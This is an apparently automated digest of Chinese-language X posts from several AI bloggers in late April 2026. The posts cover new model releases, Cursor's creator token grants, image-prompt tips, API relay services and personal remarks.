公司,也许可以让你暴富,但更大的几率是全部亏光。\n[原文链接](https://x.com/svwang1/status/2047703469063377001)\n\n**[2026-04-24T00:27:47+00:00]**\n> R to @Svwang1: 历史读得少的后果,是视野比较狭隘,看得不够远,对于因果链条比较长的事物无法正确理解,因此选择了错误的解释和预测体系。这进一步导致在关键转折点时作出错误选择,在本可低成本提早布局的时刻过于迟钝。\n[原文链接](https://x.com/svwang1/status/2047472537488302502)\n\n**[2026-04-24T00:19:18+00:00]**\n> 多看历史的一个好处是可以给自己开各种上帝视角,枯燥无聊或者低谷期时可以拥有乐观的想象力,顺风顺水时仍然保持谨慎而不得意忘形。\n[原文链接](https://x.com/svwang1/status/2047470402725921150)\n\n---\n\n### ✅ @bozhou_ai — 泊舟(20 条)\n\n**[2026-04-28T08:25:44+00:00]**\n> RT by @bozhou_ai: 《Cursor 官方扶持的 AI & Web3 创作者名录》 @cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。 以下是这 15 位获得资助的创作者及其核心画像(顺序随机): 1. Jason Zhu @GoSailGlobal …\n[原文链接](https://x.com/bozhou_ai/status/2049042369530777747)\n\n**[2026-04-28T07:51:43+00:00]**\n> memos确实是在记忆里面做的很不错的,自己做的Agent也可以接入一下他们的\n[原文链接](https://x.com/bozhou_ai/status/2049033808629129504)\n\n**[2026-04-28T07:04:22+00:00]**\n> x.com/i/article/204902020458…\n[原文链接](https://x.com/bozhou_ai/status/2049021892208521544)\n\n**[2026-04-28T00:26:49+00:00]**\n> 我也是强烈推荐5.5,现在我写文章,写代码都是用5.5,比4.7好用很多\n[原文链接](https://x.com/bozhou_ai/status/2048921844175212590)\n\n**[2026-04-27T07:19:46+00:00]**\n> 我以前也会AI焦虑,我现在做的事情,AI以后一定都能做,甚至比我好 现在我觉得,想那么多干嘛,我先用起来,玩起来,Token烧起来,做到是身边圈子里面AI用的做好的一批人就好了\n[原文链接](https://x.com/bozhou_ai/status/2048663377598452202)\n\n**[2026-04-27T05:49:10+00:00]**\n> RT by @bozhou_ai: 中文AI必关注12位高价值博主 AI内容每天都在刷屏,但真正能帮你提效、避坑、落地的其实没几个。 我挑了12位持续输出干货、实战经验丰富的中文博主,覆盖工具测评、Agent搭建、出海变现、Prompt工程、创意落地等方向,建议直接关注。 1. 摸鱼巨匠 @SunNeverSetsX AI+Web3趋势观察者,擅长把前沿资讯浓缩成可落地的认知框架,宏观视野极强 …\n[原文链接](https://x.com/bozhou_ai/status/2048640580004335669)\n\n**[2026-04-27T03:22:54+00:00]**\n> 之前花了不少时间折腾 OpenClaw,想让 AI 在手机上也能帮我干活。结果发现 Token 消耗特别大,效果也没想象中好。后来一直是用 Claude Code写好 Skills 然后给到它来执行。 一直缺的就是一个远程控制的入口。今天发现了 cc-connect 这个开源项目,刚好补上这块。 它做的事很简单:把 AI 编码助手桥接到聊天软件里。支持的面很广: AI 端:Claude Code…\n[原文链接](https://x.com/bozhou_ai/status/2048603768250585231)\n\n**[2026-04-27T01:15:43+00:00]**\n> 人生第一次录播客,我们和cell老师一起聊聊中转站的那些事\n[原文链接](https://x.com/bozhou_ai/status/2048571760698949641)\n\n**[2026-04-26T13:15:51+00:00]**\n> RT by @bozhou_ai: 《Cursor官方资助的 AI & Web3博主》 @cursor_ai 是顶级的AI项目方,最近对15位中文区的博主进行了资助,价值一万美元的Token,如果你是内行了解行情,就知道这个含金量还是很高的。 1. 杀破狼 @wolfyxbt 专注炒Memecoin、Vibe Coding与数据分析,风格幽默直率。 2. 0xAA @0xAA_Science 北…\n[原文链接](https://x.com/bozhou_ai/status/2048390603030032670)\n\n**[2026-04-26T13:00:17+00:00]**\n> GPT 5.5已经开始说人话了,opus4.7完全用不了,还贵\n[原文链接](https://x.com/bozhou_ai/status/2048386685399142532)\n\n**[2026-04-25T09:18:55+00:00]**\n> RT by @bozhou_ai: 卧槽!Cursor 开始支持中文区 AI 博主了! 这几天 Cursor 的团队成员 @edwinarbus 陆续私信了几位影响力较大的 Ai 博主,资助 1w 美金的免费额度, 算是头部 AI 产品首次对中文区做投放。但额度有时间限制,必须在 5 月 31 之前消耗掉。 现在中文区只有极少部分的 KOL 拿到这个额度,所以含金量极高,统计到的只有 15 位博…\n[原文链接](https://x.com/bozhou_ai/status/2047968587902820543)\n\n**[2026-04-25T04:13:59+00:00]**\n> RT by @bozhou_ai: Cursor官方认证博主✅ 你值得关注 11位晒Cursor $10,000额度博主,按X发帖时间大致排序 1️⃣ 铁锤人 (@lxfater) 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人 推文链接:https://x.com/lxfater/status/20477384398237330…\n[原文链接](https://x.com/bozhou_ai/status/2047891848908472433)\n\n**[2026-04-25T01:17:42+00:00]**\n> Cursor大善人,我也已经领到了,在X上获得的最大一笔收入\n[原文链接](https://x.com/bozhou_ai/status/2047847486430286317)\n\n**[2026-04-24T20:37:10+00:00]**\n> RT by @bozhou_ai: 这是一个关于两个程序员开的Claude Code中转站的呕心沥血的故事,一张聊天记录诠释web2从业者开发的中转站有多负责 今晚要进行数据库迁移,负载均衡配置,与sub2的版本对齐,还有很多为了用户体验上新的功能模块。 于是我和泊舟 @bozhou_ai 商议凌晨2点到4点进行停机更新。 泊舟明天周日要上班,陪我熬到了三点半。我今天早上要给猫打疫苗,约了早上8…\n[原文链接](https://x.com/bozhou_ai/status/2047776887116874076)\n\n**[2026-04-24T13:25:10+00:00]**\n> 今晚由于本次版本升级较大,4月25日凌晨2-4点,将进行停机更新,期间将不可用 更新内容: 1. GPT-image2 上线 3分钱一张 2. 订单查询 3. 发票信息管理和开票 4. 设置余额预警 5. 投诉与意见反馈 6. bug修复还有性能优化\n[原文链接](https://x.com/bozhou_ai/status/2047668172204188156)\n\n**[2026-04-24T11:32:51+00:00]**\n> RT by @bozhou_ai: 给大家科普一下现在GPT-Image-2的低价渠道 第一种就是ChatGPT直充,Free号不能使用,只有 Plus 和 Pro 能够使用。这里我直接推荐两个渠道: 1. 各自小店 http://caowo.store 这个店是我看到的比较便宜的,注意,这个渠道的号没有质保,随时会掉,比较便宜但是不稳定 2. Gamsgo https://www.gamsgo…\n[原文链接](https://x.com/bozhou_ai/status/2047639906030383159)\n\n**[2026-04-24T03:15:38+00:00]**\n> claude 接入 Deepseek教程 第一步: https://platform.deepseek.com/api_keys 创建apikey 第二步: 在cc Switch里面创建供应商,请求地址为 https://api.deepseek.com/anthropic APIKEY 填写刚刚创建的 第三步更改一下模型 点击高级选项,然后主模型 deepseek-v4-pro haiku为 …\n[原文链接](https://x.com/bozhou_ai/status/2047514776612556933)\n\n**[2026-04-24T03:01:58+00:00]**\n> 价格屠夫,参数是真能打\n[原文链接](https://x.com/bozhou_ai/status/2047511335995596887)\n\n**[2026-04-24T02:57:50+00:00]**\n> DeepseekV4 API这次好像真出来了 https://api-docs.deepseek.com/zh-cn/quick_start/pricing\n[原文链接](https://x.com/bozhou_ai/status/2047510299658670237)\n\n**[2026-04-24T02:23:24+00:00]**\n> 如果自己要做自媒体,打造个人影响力,我觉得博客系统还是很有必要搭建一下的,特别是对于不懂技术的朋友,这个极速搭建的系统可以快速帮我们拥有一个自己博客网站\n[原文链接](https://x.com/bozhou_ai/status/2047501631990947985)\n\n---\n\n### ✅ @lxfater — 铁锤人(19 条)\n\n**[2026-04-29T06:02:06+00:00]**\n> 用 GPT Image 2 赚钱,你想到几种方式? 我整理了5种,每种都有提示词,拿走能用 但还有一种方式不用自己会出图也能赚!! 有人进货四分钱,卖两毛,自己一张图都不出 闲鱼上已经有人在跑了 其余 5 种看图 完整提示词加自动化流程,请看引用文章👇\n[原文链接](https://x.com/lxfater/status/2049368609193926810)\n\n**[2026-04-29T03:28:30+00:00]**\n> R to @lxfater: 海报图片提示词 : 请生成一张随机的瑜伽宣传海报拼贴总图。 整体要求: 在一张大画面中,随机分隔出 N 张彼此独立的瑜伽宣传海报 每张卡面尺寸随机设计铺满整张图 卡面之间用清晰的留白、细边框、拼贴切割线或杂志式分隔结构隔开 整体像一次抽出了 N 张不同风格的高质量瑜伽宣传海报 每张海报都要明显不同,具有\"随机抽卡\"的新鲜感和丰富变化 所有海报统一保持高级、专业、吸引…\n[原文链接](https://x.com/lxfater/status/2049329956153352499)\n\n**[2026-04-29T03:28:29+00:00]**\n> R to @lxfater: 如何使用Agent 模式 3 步: 选图像模式 选GPT-2-image 点 Agent 按钮 利用下面给的提示词,出了分镜图和人设图 接下来,利用分镜图和人设图,我们就可以控制人物动作啦!! 如何做到呢?主要思路就是让摆出开始的瑜伽动作和结束的瑜伽动作(具体如图一所示) 得出首帧和尾帧,直接喂给可灵视频模型,就出上面的视频了 多个视频就可以出系列的瑜伽动作 flo…\n[原文链接](https://x.com/lxfater/status/2049329950495310198)\n\n**[2026-04-29T03:28:28+00:00]**\n> 做内容运营,生图生视频,你现在还在跑好几个工具吗? 被朋友拉去做瑜伽图,搭了无数工作流 GPT Image 2 出来后,发现全废了 得重新规划一套,但这几天身体不舒服,没心思搞 随手把提示词扔进 flowith 试了一下 以为偷懒的结果会很烂,但实际上这个是我最近用的最好的生图agent之一。 它直接出了 12 个瑜伽动作分镜,动作清晰,描述完整 分镜图和人物图来生成出首末两张图片,用视频模式可…\n[原文链接](https://x.com/lxfater/status/2049329944052859141)\n\n**[2026-04-29T00:05:46+00:00]**\n> 看来草莓问题和洗车问题很经典了,ChatGPT都在测试\n[原文链接](https://x.com/lxfater/status/2049278935897186512)\n\n**[2026-04-28T13:31:04+00:00]**\n> Flowith出 GPT image 的生图Agent,真快呀 我赶紧试试,看看如何!!\n[原文链接](https://x.com/lxfater/status/2049119209502670864)\n\n**[2026-04-28T07:24:37+00:00]**\n> 说得太对了👍,牛逼\n[原文链接](https://x.com/lxfater/status/2049026986442707117)\n\n**[2026-04-28T06:55:56+00:00]**\n> x.com/i/article/204837140806…\n[原文链接](https://x.com/lxfater/status/2049019768456241273)\n\n**[2026-04-28T06:15:15+00:00]**\n> R to @lxfater: 来源: [1]https://www.businesstoday.in/technology/story/sam-altmans-outside-bets-raise-fresh-conflict-questions-as-openai-nears-ipo-526161-2026-04-17 [2] https://thenextweb.com/news/opena…\n[原文链接](https://x.com/lxfater/status/2049009528595685705)\n\n**[2026-04-28T06:14:44+00:00]**\n> Sam Altman 最聪明的地方,不是把 AI 做起来,是这套给自己捞钱的手法 2015 年,OpenAI 打着非营利的旗号成立 顶级研究员冲着使命感来,不要钱只要理想 Musk 看到了,砸了 3800 万进去 监管也没把它当商业公司盯 连 Musk 这种人都信了 但 CEO 在想另一件事 Altman 从 2014 年开始,在核聚变公司 Helion 买了股 2021 年一口气砸进去 3.7…\n[原文链接](https://x.com/lxfater/status/2049009402372313341)\n\n**[2026-04-28T05:41:43+00:00]**\n> GPT-5.5 在 Code Arena 排第 9 难道是 OpenAI 编程这块掉队了? 但 Arena 自己的统计负责人,几小时后发了条澄清 这榜单,当前只测前端或者说Web DEV GPT-5.5全栈和 GitHub 集成,还要几个月才上,所以现在这方面很弱。 所以不是它编码不行,是它前端这块比 Claude 弱 Code Arena,Code范围仅仅前端也太不合理了吧\n[原文链接](https://x.com/lxfater/status/2049001091916783635)\n\n**[2026-04-28T03:43:41+00:00]**\n> Opus 4.7 的任务遵从性好点,但是其他方面都不如GPT-5.5了 可以用性方面,GPT-5.5很容易低价购得,不被封号\n[原文链接](https://x.com/lxfater/status/2048971387872620715)\n\n**[2026-04-27T11:32:28+00:00]**\n> 栋哥换账号了,帮忙转发一下\n[原文链接](https://x.com/lxfater/status/2048726973682475250)\n\n**[2026-04-26T06:46:13+00:00]**\n> 中国群友的幻想集合: 1. 自动化做自媒体 2. 自动炒股票赚钱 这些都是普通人都能参与的玩意\n[原文链接](https://x.com/lxfater/status/2048292547966210069)\n\n**[2026-04-26T04:53:59+00:00]**\n> 有什么 skill 能把一个设计系统拆解就好了,有吗?\n[原文链接](https://x.com/lxfater/status/2048264304261312720)\n\n**[2026-04-25T09:32:02+00:00]**\n> 铁锤人看了一下额度有1w美金,瞬间眩晕瘫坐,如同第一次看到原子弹爆炸!\n[原文链接](https://x.com/lxfater/status/2047971888409051368)\n\n**[2026-04-25T06:48:24+00:00]**\n> 现在全中推的人都在求Cursor的额度了😂\n[原文链接](https://x.com/lxfater/status/2047930707784487236)\n\n**[2026-04-25T04:16:28+00:00]**\n> 嘿嘿,半夜睡不着占了点优势\n[原文链接](https://x.com/lxfater/status/2047892472177844641)\n\n**[2026-04-24T18:06:34+00:00]**\n> R to @cursor_ai: 兄弟们1w美金 TOKEN呀 https://x.com/lxfater/status/2047738439823733097?s=20\n[原文链接](https://x.com/lxfater/status/2047738989571154030)\n\n---\n\n### ✅ @berryxia — Berryxia(20 条)\n\n**[2026-04-29T06:32:45+00:00]**\n> 看别人天天发商单,还特么疯狂涨粉。 难受了☹️ 是时候,我也要让甲方爸爸来几个单了! 助我一臂之力了嘿嘿😁 在线等啊…\n[原文链接](https://x.com/berryxia/status/2049376324444410138)\n\n**[2026-04-28T23:51:17+00:00]**\n> Google Gemma 官方教你本地跑 Coding Agent! 本地完美组合来了: • Pi Agent • Gemma 4 26B 模型 • LM Studio / Ollama / llama.cpp 等 serving engine 完全离线运行、零 API 费用、100% 隐私保护、零延迟!本地开发者 Agentic 开发神器! 附 @patloeber 详细一步步搭建教程👇 ht…\n[原文链接](https://x.com/berryxia/status/2049275291164692726)\n\n**[2026-04-28T23:46:25+00:00]**\n> 🚀 OpenBMB 重磅发布!MiniCPM-o 4.5 技术报告来了! 9B 参数多模态模型实现突破性实时交互: • Omni-Flow 框架:原生全双工流式交互(视频+音频+文本毫秒级同步) • Native Full-Duplex + Proactive Interaction(无需VAD,可主动提醒) • 多模态基准接近 Gemini 2.5 Flash(MMBench 87.6 / M…\n[原文链接](https://x.com/berryxia/status/2049274065610027362)\n\n**[2026-04-28T22:51:25+00:00]**\n> R to @berryxia: GitHub:https://github.com/harflabs/SwiftVLC ```\n[原文链接](https://x.com/berryxia/status/2049260222863266206)\n\n**[2026-04-28T22:51:22+00:00]**\n> 这个老哥 写的SwiftVLC 正式开源啦!🔥 现代 Swift 6 对 libVLC 的高质量 wrapper(驱动 Tilfaz 应用): • 直接 C bindings,无 Objective-C 桥接 • 严格并发支持(Strict Concurrency) • 专为 SwiftUI 量身打造 • 支持 iOS、macOS、tvOS、Mac Catalyst 附带完整 Showcase …\n[原文链接](https://x.com/berryxia/status/2049260211895185445)\n\n**[2026-04-28T22:48:37+00:00]**\n> GPT2 真的成精了!的确! 小小东老哥整的这套提示词很不错,推荐大家!\n[原文链接](https://x.com/berryxia/status/2049259518027276559)\n\n**[2026-04-28T22:31:31+00:00]**\n> 3D 网格生成重磅突破!SATO 来了! • 从点云(Point Clouds)直接生成完整网格 • Strip-based tokenization,实现超干净边缘流与结构 • 原生 UV segmentation 直接 baked into 生成过程 • 单个模型同时支持三角网格 + 四边形网格\n[原文链接](https://x.com/berryxia/status/2049255217603178794)\n\n**[2026-04-28T22:26:54+00:00]**\n> 我靠!兄弟们?Warp 都要开源了! 官方宣布Warp 正式全面开源啦!🔥 知名现代终端 + Agentic 开发环境 Warp 现在完全开源! • 代码、Roadmap、贡献流程全部开放 • GitHub:https://github.com/warpdotdev/warp • Oz AI agents(GPT 驱动)负责 coding、planning、testing • OpenAI De…\n[原文链接](https://x.com/berryxia/status/2049254052840812960)\n\n**[2026-04-28T22:22:48+00:00]**\n> NVIDIA 重磅发布!🚀 Nemotron 3 Nano Omni 多模态开源模型来了! 🔥 30B 参数 🔥 256K 超长上下文 🔥 最高效开放多模态模型(语言+视觉+语音+视频+音频一体化) 🔥 专为 subagents / Agentic 任务设计 🔥 完全开源(权重 + 数据 + 配方),领跑多项榜单 可通过 NVIDIA NIM API 免费试用!完美 powering 多代理工作…\n[原文链接](https://x.com/berryxia/status/2049253021159403786)\n\n**[2026-04-28T22:20:51+00:00]**\n> Apple Vision Pro “首次”用于真实手术!👀 世界首例白内障手术诞生! 这里我补充一下其实AVP在几年前刚出来那会就已经有国内沈阳那边的医院用于做手术,国内北大好像也有并非首例! 纽约 SightMD 眼科医生 Dr. Eric Rosenberg 使用 Apple Vision Pro + ScopeXR 混合现实平台,于2025年10月完成全球首例,至今已成功实施数百例。 支持…\n[原文链接](https://x.com/berryxia/status/2049252532015579248)\n\n**[2026-04-28T22:13:55+00:00]**\n> R to @berryxia: huggingface.co/poolside/Lagu…\n[原文链接](https://x.com/berryxia/status/2049250788422353142)\n\n**[2026-04-28T22:13:37+00:00]**\n> 前Github CTO team带着新模型来了! 他们的Poolside AI 团队刚刚开源了他们的首个权重模型! 模型名称 Laguna XS.2 • 33B total / 3B active MoE • Apache 2.0 完全开源 • 专为 Agentic Coding + 长时序任务设计 • 单张 GPU 即可流畅运行 同时发布 Laguna M.1(当前最强版)和 Agent Ha…\n[原文链接](https://x.com/berryxia/status/2049250710492160228)\n\n**[2026-04-28T22:10:16+00:00]**\n> 🚀 视频模型其实早就懂3D了! 微软World-R1用RL直接唤醒,无需改架构、无视频训练数据、无额外推理成本! 1. 把相机轨迹嵌入扩散噪声,零额外模块 2. 用Depth Anything 3 + Qwen3-VL做3D几何评判器 3. 周期性解耦训练,建筑保持刚性、旗帜依然飘动 4. 仅用3K条文本提示完成训练,效果惊人 视频生成迈向真实世界模拟的关键一步! 项目地址: https://g…\n[原文链接](https://x.com/berryxia/status/2049249868376604931)\n\n**[2026-04-28T22:02:28+00:00]**\n> Claude 重磅连接创意专业工具! 全新 Blender 和 Autodesk Fusion 连接器上线,通过对话直接调试场景、构建工具、修改3D模型,创意工作流直接搞起来! 1. Blender 连接器:调试场景、批量应用变化、构建新工具,全在 Claude 中完成 2. Autodesk Fusion 连接器:通过自然对话创建和修改3D模型,设计师和工程师效率拉满 3.同日上线更多连接器:…\n[原文链接](https://x.com/berryxia/status/2049247904536428805)\n\n**[2026-04-28T10:31:01+00:00]**\n> R to @berryxia: Hugging Face: https://huggingface.co/collections/sensenova/sensenova-u1 在线体验与接入: SenseNova官网:https://sensenova.sensetime.com/\n[原文链接](https://x.com/berryxia/status/2049073897660953075)\n\n**[2026-04-28T10:31:00+00:00]**\n> 🔥兄弟们,最近多模态图像模型真是神仙打架啊! 看来又要来一波,实测对比了啊! 前几天才发完测试,又有新的模型,真心吃不消啊! 又发现一个全网开源、即刻可用的重磅神器 —— 商汤 OpenSenseNova 刚刚发布 SenseNova-U1! 原生统一多模态大模型,NEO-Unify架构,视觉+语言从第一性原理彻底打通,无独立VE/VAE! 核心技术亮点: • 文本与图像深度交错生成(教程、海报…\n[原文链接](https://x.com/berryxia/status/2049073892829036759)\n\n**[2026-04-28T01:23:38+00:00]**\n> 最让中文出圈的一次竟然就是AI这一波! YC 创始人都开始「出淤泥而不染」了。 那么问题来了?谁是不染?\n[原文链接](https://x.com/berryxia/status/2048936142226309297)\n\n**[2026-04-28T01:21:56+00:00]**\n> 好消息,Outlook 终于特么支持Agent了。 坏消息,国内是否也支持?\n[原文链接](https://x.com/berryxia/status/2048935713950064964)\n\n**[2026-04-27T23:47:24+00:00]**\n> 🚀 Claude Code 终于可以和浏览器并排实时控制了! YC 大佬推出 GStack Browser + /open-gstack-browser skill,调试体验直接起飞! 1. 在 Claude Code 中输入 Install GStack 快速安装 2. 输入 /open-gstack-browser 即可打开浏览器窗口 3. 实现 Claude Code 和浏览器完全 sid…\n[原文链接](https://x.com/berryxia/status/2048911923983593818)\n\n**[2026-04-27T23:35:02+00:00]**\n> R to @berryxia: 地址 https://developers.cloudflare.com/ai/models/minimax/music-2.6/\n[原文链接](https://x.com/berryxia/status/2048908812955070684)\n\n---\n\n### ✅ @Pluvio9yte — 雪踏乌云(17 条)\n\n**[2026-04-29T08:20:26+00:00]**\n> 兄弟们,搞3D的直接冲🤩🤩🤩 Claude上线了Blender MCP连接器, 自然语言直接操控Blender的Python API, 调场景、批量改物体、写自定义工具,不用会一行代码, 我之前在Blender写个批量脚本至少折腾半小时, 现在一句话就搞定了, 更狠的是Anthropic同时砸钱加入了Blender基金会当赞助商, 这波是总共9个创意工具连接器一起上线\n[原文链接](https://x.com/Pluvio9yte/status/2049403423813140571)\n\n**[2026-04-29T04:39:21+00:00]**\n> 未来属于设计 测评 和 运营\n[原文链接](https://x.com/Pluvio9yte/status/2049347785456316549)\n\n**[2026-04-29T01:17:10+00:00]**\n> 搭配收集免费模型的开源项目 使用这篇文章更佳 https://github.com/cheahjs/free-llm-api-resources\n[原文链接](https://x.com/Pluvio9yte/status/2049296905382035945)\n\n**[2026-04-29T01:02:14+00:00]**\n> x.com/i/article/204914647001…\n[原文链接](https://x.com/Pluvio9yte/status/2049293145670836459)\n\n**[2026-04-28T18:42:36+00:00]**\n> 这份提示词感觉用处很多,除了自己写文章当封面,哪天公司要做海报之类的用来小装一手也很有用的🤓 话不多说,看图。提示词见引用文章。\n[原文链接](https://x.com/Pluvio9yte/status/2049197606619017697)\n\n**[2026-04-28T14:06:55+00:00]**\n> 你们的ChatGPT都是什么样子? 提示词如下: ChatGPT,你陪我一段时间了,我想看看你的样子。请生成一张类似你自己用iPhone随手自拍的照片:没有明确主题、没有刻意构图,只是很普通、甚至有点失败的快照。照片略带运动模糊,光线不均、轻微曝光过度,角度尴尬,构图混乱,整体呈现出一种\"过于真实的随手一拍感”,就像是从口袋里拿出手机不小心按到的自拍 linuxdo刷到的\n[原文链接](https://x.com/Pluvio9yte/status/2049128229760561602)\n\n**[2026-04-28T08:25:44+00:00]**\n> RT by @Pluvio9yte: 《Cursor 官方扶持的 AI & Web3 创作者名录》 @cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。 以下是这 15 位获得资助的创作者及其核心画像(顺序随机): 1. Jason Zhu @GoSailGlobal…\n[原文链接](https://x.com/Pluvio9yte/status/2049042369530777747)\n\n**[2026-04-28T07:24:33+00:00]**\n> 找合伙人,先看家室 我知道这个标题会得罪一大堆人。 但我还是要说。 因为这个坑我自己踩过,而且踩得很深,深到现在回想起来还会觉得胸口闷一下。 事情是这样的。去年我找合伙人,找到一个我觉得各方面都很合适的人。能力没问题,聊起来也很投机,对方向的判断跟我高度一致。我当时觉得,就是他了。 然后我就开始掏心掏肺。 我是那种一旦认定了合伙人,就会把底牌全部摊开的人。资源、人脉、我对未来的规划、我手上的牌,…\n[原文链接](https://x.com/Pluvio9yte/status/2049026972337197330)\n\n**[2026-04-28T07:04:22+00:00]**\n> RT by @Pluvio9yte: x.com/i/article/204902020458…\n[原文链接](https://x.com/Pluvio9yte/status/2049021892208521544)\n\n**[2026-04-28T07:01:58+00:00]**\n> 大模型还有擂台赛的😂😂😂\n[原文链接](https://x.com/Pluvio9yte/status/2049021288069599538)\n\n**[2026-04-28T07:00:50+00:00]**\n> MemOS 是所有记忆系统中我用到的最好的,我前几天发现新添加了记忆可视化插件的内容,然后就安装体验了 原来我们可能好奇到底OpenClaw Hermes此类的Agent到底记住了什么,现在在可视化插件的帮助下,我们终于能够看见了他们记忆的内容。\n[原文链接](https://x.com/Pluvio9yte/status/2049021003540598840)\n\n**[2026-04-28T06:58:25+00:00]**\n> x.com/i/article/204900159355…\n[原文链接](https://x.com/Pluvio9yte/status/2049020395874075090)\n\n**[2026-04-28T06:49:24+00:00]**\n> RT by @Pluvio9yte: 介绍下我自己,我是互联网大厂的在职算法工程师,在X上公开分享我学习AI、构建产品和第二收入曲线的过程。 公众号:柯基的思考笔记 下面是一些我搭建的,可能对你有用的东西: 1. 一个每日AI新闻skill,follow 1000+信息源,结合你的个人需求进行定制摘要 介绍:https://x.com/Keji715/status/204839913395467…\n[原文链接](https://x.com/Pluvio9yte/status/2049018122737213860)\n\n**[2026-04-28T05:35:31+00:00]**\n> RT by @Pluvio9yte: 从去年7月份到现在,一路从 Web 排版工具,到 API 服务,再到公众号创作 CLI。 我自己开发者也是创作者,这个产品会尽力保证每个月迭代1次+。 简单说一下目前公众号创作 CLI 支持哪些模式? AI 模式(免费):生成排版 prompt,由你的 Claude / Codex 继续处理,3 个基础主题,动手能力强的自由定制。 API 模式(专业服务):…\n[原文链接](https://x.com/Pluvio9yte/status/2048999532768190606)\n\n**[2026-04-28T04:19:08+00:00]**\n> http://dragoncode.codes 目前全面支持GPT-5.5和GPT-Image-2 可开发票 其实我觉得最有价值的不是我们的中转站,是我们的售后群。 目前已经从售后群里分列出来了跨境交流群,技术交流群。甚至有中学老师用AI撬动了杠杆得到了群友的一直惊叹。 昨天群里技术大牛交流的agent我都看不懂了,还是中转站的高手多🤡\n[原文链接](https://x.com/Pluvio9yte/status/2048980307605635336)\n\n**[2026-04-27T17:15:31+00:00]**\n> 如果不想为Token付费,最好的方案就是在 http://openrouter.ai 上找一些免费模型或者限时免费模型来用Claude Code 配置方案推荐阅读这篇文章\n[原文链接](https://x.com/Pluvio9yte/status/2048813303368138906)\n\n**[2026-04-27T17:03:55+00:00]**\n> 目前最有性价比的模型 GPT-5.5 最有好的官订方案 Claude $100 + ChatGPT $100 最有性价比的方案 Claude 中转站 + ChatGPT $100 为什么 GPT-5.5 这么强并且语言输出改观之后还应该用Claude? 1. 规划能力,Opus 仍然处于一流水准,GPT能补充方案但是不能进行规划。 这里的规划并不是完完全全的规划,而是人永远无法给全上下文,永远要…\n[原文链接](https://x.com/Pluvio9yte/status/2048810385105686557)\n\n---\n\n### ✅ @liuliu — 刘进(3 条)\n\n**[2026-04-24T04:05:41+00:00]**\n> I've been thinking about local LLMs a lot these days.\n[原文链接](https://x.com/liuliu/status/2047527371486658814)\n\n**[2026-04-23T17:57:10+00:00]**\n> I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.\n[原文链接](https://x.com/liuliu/status/2047374234004115719)\n\n**[2026-04-22T16:16:24+00:00]**\n> Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work! Ask Codex to implement a segmented file downloader: didn’t even get the completion blo…\n[原文链接](https://x.com/liuliu/status/2046986486629986435)\n\n---\n\n### ✅ @CuiMao — CuiMao(19 条)\n\n**[2026-04-29T07:55:14+00:00]**\n> Deepseek好像要发多模态的了,好好睁开眼睛看看这个世界吧!\n[原文链接](https://x.com/CuiMao/status/2049397079177592925)\n\n**[2026-04-29T07:44:33+00:00]**\n> x.com/i/article/204921670329…\n[原文链接](https://x.com/CuiMao/status/2049394392776290573)\n\n**[2026-04-29T07:09:24+00:00]**\n> 😄\n[原文链接](https://x.com/CuiMao/status/2049385544577438121)\n\n**[2026-04-29T07:02:18+00:00]**\n> 哈哈。主页刷到很多小朋友拿到了字节的 offer ,恭喜啊,我当时进字节的第一天,乌云遮天,大雨滂沱,电闪雷鸣,预示着一个伟大的产品经理即将孕育而生。😎😎,加油!,每天都是 Day 1\n[原文链接](https://x.com/CuiMao/status/2049383757535490257)\n\n**[2026-04-29T06:04:54+00:00]**\n> 呵呵,上个月我说雷总的模型会把价格打下来,一群人喷我懂个 p 的 AI ,今天满屏都是感谢雷总,天地良心,成年人的世界真的他妈的太现实了吧。\n[原文链接](https://x.com/CuiMao/status/2049369313547800804)\n\n**[2026-04-28T18:44:13+00:00]**\n> 干爹发新模型了! 属于Nemotron 3 系列中的多模态版本。可以文本、图像、视频、音频的统一理解与推理,专为Agentic AI设计,特别适合给多模态感知子代理用,我来试试给Hermes用用看,\n[原文链接](https://x.com/CuiMao/status/2049198015232315465)\n\n**[2026-04-28T14:06:08+00:00]**\n> 50000🎉🎉\n[原文链接](https://x.com/CuiMao/status/2049128032661852434)\n\n**[2026-04-28T14:03:04+00:00]**\n> 如果你的claude里面要接deepseek v4 pro,effort一定要拉到max才有效果。官方文档里说的。也挺好,反正这几天四舍五入等于不要钱。\n[原文链接](https://x.com/CuiMao/status/2049127261409034535)\n\n**[2026-04-28T13:35:22+00:00]**\n> R to @CuiMao: 支持json格式的日志导出!很重要\n[原文链接](https://x.com/CuiMao/status/2049120290949702063)\n\n**[2026-04-28T13:29:32+00:00]**\n> 因为要做benchmark,所以用claude做了个win原生的显卡监控,市面上的都过度设计给游戏用的花里胡哨。这个版本算跑起来了,下个一版本支持本地多卡监控。\n[原文链接](https://x.com/CuiMao/status/2049118822070997394)\n\n**[2026-04-28T12:11:57+00:00]**\n> 麻烦下次这种表单不要at我,我就是个傻逼,我不配。谢谢。\n[原文链接](https://x.com/CuiMao/status/2049099295337709885)\n\n**[2026-04-28T10:30:47+00:00]**\n> 😅😅玩游戏顶着 CuiMao 的 ID 被队友认出来了。\n[原文链接](https://x.com/CuiMao/status/2049073837543940468)\n\n**[2026-04-28T07:47:59+00:00]**\n> 听我一句劝,不要接触 .NET。 不要什么都想学,不要觉得 AI 牛逼了,自己就也牛逼起来了。 有些技术不是用来学习的,是用来渡劫的。 不要接触 .NET,人生会变得不幸。\n[原文链接](https://x.com/CuiMao/status/2049032868610072772)\n\n**[2026-04-28T07:35:15+00:00]**\n> 昨天试了下快乐🐎,早上起来一看欠费了, 我是韭菜我自豪。😎😎😎\n[原文链接](https://x.com/CuiMao/status/2049029664639979624)\n\n**[2026-04-27T15:28:57+00:00]**\n> 我不说你们自己看 同一套提示词 happyhorse和seedance2 赛博商K以后可以当视频模型的基准测试了\n[原文链接](https://x.com/CuiMao/status/2048786486435492337)\n\n**[2026-04-27T12:36:02+00:00]**\n> 未收货,仅退款,\n[原文链接](https://x.com/CuiMao/status/2048742972020470168)\n\n**[2026-04-27T12:21:31+00:00]**\n> R to @CuiMao: @grok 